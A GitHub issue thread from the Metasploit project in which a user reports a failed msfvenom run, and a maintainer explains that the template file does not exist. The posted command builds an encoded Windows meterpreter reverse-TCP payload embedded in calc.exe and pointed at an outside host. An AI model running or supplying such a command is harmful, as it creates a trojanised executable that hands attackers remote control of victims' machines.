### ISSUE TITLE
msfvenom payload : Not Generating msfvenom payload.

### ISSUE THREAD

**Issue by Tikam02** [rapid7/metasploit-framework#8350]
I run this command 

msfvenom -a x86 --platform windows -x /root/calc.exe -k -f exe -o /root/calc1.exe -e x86/shikata_ga_nai -i 1 -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=12345

And this happenned :   

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai chosen with final size 360
Payload size: 360 bytes
Error: No such file or directory @ rb_sysopen - /root/calc.exe

Metasploit-version- metasploit v4.14.7-dev  

 I installed Metasploit with: Already there kali -package

OS : kali linux 2.0 [Updated]

**Comment by kaospunk** [comment]
You requested it to use /root/calc.exe as the template file. Does that file actually exist on your machine?

**Comment by Tikam02** [comment]
ohk i'll try it differently , thanks  👍

**Comment by Aadeshjha** [comment]
Thamk uh
